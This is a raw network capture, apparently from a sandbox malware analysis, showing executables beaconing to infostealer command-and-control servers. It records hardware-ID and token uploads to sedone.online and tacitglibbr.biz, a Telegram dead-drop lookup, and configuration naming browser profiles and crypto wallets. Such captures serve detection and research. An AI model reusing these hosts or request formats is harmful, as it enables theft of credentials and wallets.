2024-12-16 10:03:21 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-16 10:03:21 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-16 10:03:21 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49832	34.226.108.155	443	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:28 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-16 10:03:29 UTC	224	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:03:29 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-16 10:03:29 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49875	149.154.167.99	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:45 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:45 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 10:03:45 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12323 Connection: close Set-Cookie: stel_ssid=14ec39302d4685abc4_1983204853921028068; expires=Tue, 17 Dec 2024 10:03:45 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-16 10:03:45 UTC	12323	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49883	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:47 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:03:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49889	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:50 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----N79HDBSJMYM7YUS0R1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:50 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 39 48 44 42 53 4a 4d 59 4d 37 59 55 53 30 52 31 4e 59 2d 2d 0d Data Ascii: ------N79HDBSJMYM7YUS0R1NYContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849-a33c7340-61ca------N79HDBSJMYM7YUS0R1NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------N79HDBSJMYM7YUS0R1NY--
2024-12-16 10:03:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:03:51 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|e62c01882c8263997516fd4b6363b88a\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49898	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:52 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----C2DT0Z5PPH4E3E3WLFKX User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 32 44 54 30 5a 35 50 50 48 34 45 33 45 33 57 4c 46 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 5a 35 50 50 48 34 45 33 45 33 57 4c 46 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 5a 35 50 50 48 34 45 33 45 33 57 4c 46 4b 58 0d 0a 43 6f 6e 74 Data Ascii: ------C2DT0Z5PPH4E3E3WLFKXContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------C2DT0Z5PPH4E3E3WLFKXContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------C2DT0Z5PPH4E3E3WLFKXCont
2024-12-16 10:03:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:03:53 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49901	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:53 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-16 10:03:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-16 10:03:56 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f9hct9vbph6g11hekmoen2j58d; expires=Fri, 11-Apr-2025 03:50:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E063KaNXtTEUvdf3YcqlwsxYCvLm9Noq97iQP4ZvShr59Du2Pl51xOlNRREGxhHvx58Z4j5OmF%2FWGtgtIg%2F2X2SRewcaT%2FGSIWy8GpSziM6CjebQhCA5plX4UG02mWykUY0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd89e7e397cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1780&rtt_var=693&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1549893&cwnd=222&unsent_bytes=0&cid=7a7e5a6041ddffe1&ts=2438&x=0"
2024-12-16 10:03:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-16 10:03:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49908	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:55 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VSJECBI5FCBIMYUSJE37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:03:55 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 42 49 35 46 43 42 49 4d 59 55 53 4a 45 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 42 49 35 46 43 42 49 4d 59 55 53 4a 45 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 53 4a 45 43 42 49 35 46 43 42 49 4d 59 55 53 4a 45 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------VSJECBI5FCBIMYUSJE37Content-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------VSJECBI5FCBIMYUSJE37Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VSJECBI5FCBIMYUSJE37Cont
2024-12-16 10:03:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:03:56 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49913	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:03:57 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: tacitglibbr.biz
2024-12-16 10:03:57 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-16 10:03:58 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a914e7mi5u56vqvathkorfbppj; expires=Fri, 11-Apr-2025 03:50:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6oWi1Y50sy2A%2Bv3nMQu7258DUMXwjlVUkur5veZf%2BKK6tyVSn6urjRsxzt4YZdputDs%2FUSP8D9UlRnEfvVqHwsOOmR7BKqAaBAhMcnmf12NtsD1mfh6LOcZ8uC92OMKvCA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd8b4cfa1424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2308&min_rtt=2093&rtt_var=938&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=946&delivery_rate=1395126&cwnd=208&unsent_bytes=0&cid=71bab05858dad3c0&ts=1481&x=0"
2024-12-16 10:03:58 UTC	357	IN	Data Raw: 63 63 37 0d 0a 37 4e 36 61 75 54 44 6c 54 4c 54 67 66 59 53 65 6b 53 66 64 42 58 52 54 53 69 79 47 34 46 6f 4e 72 58 6f 39 65 66 49 43 2f 4b 69 58 2f 4f 79 62 43 74 46 67 6c 70 4d 59 70 71 54 6c 56 61 68 67 57 48 45 72 53 4b 54 61 50 47 7a 42 43 56 68 56 30 48 53 52 69 74 61 34 2b 39 56 44 67 47 43 57 68 51 57 6d 70 4d 70 63 2f 32 41 61 63 58 41 4f 34 34 6f 34 62 4d 45 59 58 42 4b 64 63 70 44 4c 68 4c 4c 39 30 56 57 47 4b 4e 57 4d 45 4f 48 37 39 45 61 33 61 78 30 2b 49 6b 47 6b 7a 48 68 6f 31 31 67 48 57 37 39 6e 69 4d 6d 68 76 2b 6e 53 45 70 68 67 7a 38 49 59 36 72 79 72 42 62 78 67 46 6a 38 73 53 4f 32 49 4d 6d 58 4a 47 56 6b 54 67 6d 75 61 77 49 53 38 2f 74 42 66 6a 7a 7a 59 68 68 66 71 2f 66 35 47 2f 79 6c 57 4e 6a 41 4f 76 4d 4a 72 58 63 77 4a 54 67 Data Ascii: cc77N6auTDlTLTgfYSekSfdBXRTSiyG4FoNrXo9efIC/KiX/OybCtFglpMYpqTlVahgWHErSKTaPGzBCVhV0HSRita4+9VDgGCWhQWmpMpc/2AacXAO44o4bMEYXBKdcpDLhLL90VWGKNWMEOH79Ea3ax0+IkGkzHho11gHW79niMmhv+nSEphgz8IY6ryrBbxgFj8sSO2IMmXJGVkTgmuawIS8/tBfjzzYhhfq/f5G/ylWNjAOvMJrXcwJTg
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 69 68 54 74 2b 65 46 4f 74 6d 6f 62 4d 53 56 45 36 34 45 34 61 4d 55 53 55 42 47 55 62 5a 50 4d 6a 72 79 34 6c 52 4b 41 4e 70 62 61 58 38 58 35 34 30 4b 7a 63 56 51 4c 61 46 47 71 6d 33 68 6f 77 31 67 48 57 35 68 6c 6e 63 6d 46 73 2f 76 54 57 5a 55 75 78 49 51 53 34 2b 37 31 51 4c 46 74 46 53 4d 69 51 4f 4b 42 4d 57 54 47 48 56 67 66 30 43 37 65 7a 5a 62 38 6f 4a 74 7a 69 69 58 61 69 41 6a 6d 76 4f 77 4c 70 69 63 52 50 57 67 57 70 49 59 35 61 38 34 63 55 52 57 55 62 4a 6a 45 67 37 50 2b 30 56 4b 41 4a 4e 36 4b 48 75 76 33 2f 45 57 36 61 68 49 33 4a 45 2f 68 77 6e 59 76 79 41 41 66 51 39 42 4f 6d 63 6d 63 2f 73 33 59 58 49 6b 70 77 4d 49 41 71 4f 57 7a 51 72 4d 6e 54 6e 45 6d 53 2b 75 51 4f 58 33 4b 46 6b 30 58 6c 57 61 54 79 59 43 38 2f 64 78 66 69 53 6a Data Ascii: ihTt+eFOtmobMSVE64E4aMUSUBGUbZPMjry4lRKANpbaX8X540KzcVQLaFGqm3how1gHW5hlncmFs/vTWZUuxIQS4+71QLFtFSMiQOKBMWTGHVgf0C7ezZb8oJtziiXaiAjmvOwLpicRPWgWpIY5a84cURWUbJjEg7P+0VKAJN6KHuv3/EW6ahI3JE/hwnYvyAAfQ9BOmcmc/s3YXIkpwMIAqOWzQrMnTnEmS+uQOX3KFk0XlWaTyYC8/dxfiSj
2024-12-16 10:03:58 UTC	1369	IN	Data Raw: 4f 57 7a 51 72 4d 6e 54 6e 45 6c 52 75 47 48 4e 32 37 46 46 6c 6f 52 6e 47 69 51 79 5a 79 7a 2f 4e 74 65 6a 79 54 62 6a 42 76 75 39 66 68 4f 75 57 63 58 4f 32 67 41 70 49 55 67 4c 35 64 59 61 78 79 63 62 5a 47 49 75 37 2f 32 31 56 57 52 62 73 6e 4d 42 71 62 37 2f 77 58 6e 4a 78 6f 34 4b 45 58 75 68 6a 68 6f 77 68 31 63 48 4a 4e 74 6d 63 43 41 75 2f 7a 58 57 34 6f 6f 31 6f 55 62 34 2b 37 32 54 4c 4e 72 56 6e 39 6f 53 66 7a 43 59 43 2f 67 48 30 6b 59 76 32 4f 50 77 38 36 6a 74 73 49 53 67 43 4b 57 32 6c 2f 68 2b 66 74 4f 75 57 38 57 49 79 31 41 37 34 4d 79 61 63 34 56 55 78 32 51 59 5a 37 4d 67 72 7a 2f 33 45 43 56 4b 39 43 51 46 61 61 79 73 30 4b 6e 4a 30 35 78 48 6c 37 7a 6b 79 34 74 2b 68 74 52 46 5a 64 32 33 74 58 41 70 62 6a 63 58 73 64 32 6c 6f 6b 66 Data Ascii: OWzQrMnTnElRuGHN27FFloRnGiQyZyz/NtejyTbjBvu9fhOuWcXO2gApIUgL5dYaxycbZGIu7/21VWRbsnMBqb7/wXnJxo4KEXuhjhowh1cHJNtmcCAu/zXW4oo1oUb4+72TLNrVn9oSfzCYC/gH0kYv2OPw86jtsISgCKW2l/h+ftOuW8WIy1A74Myac4VUx2QYZ7Mgrz/3ECVK9CQFaays0KnJ05xHl7zky4t+htRFZd23tXApbjcXsd2lokf
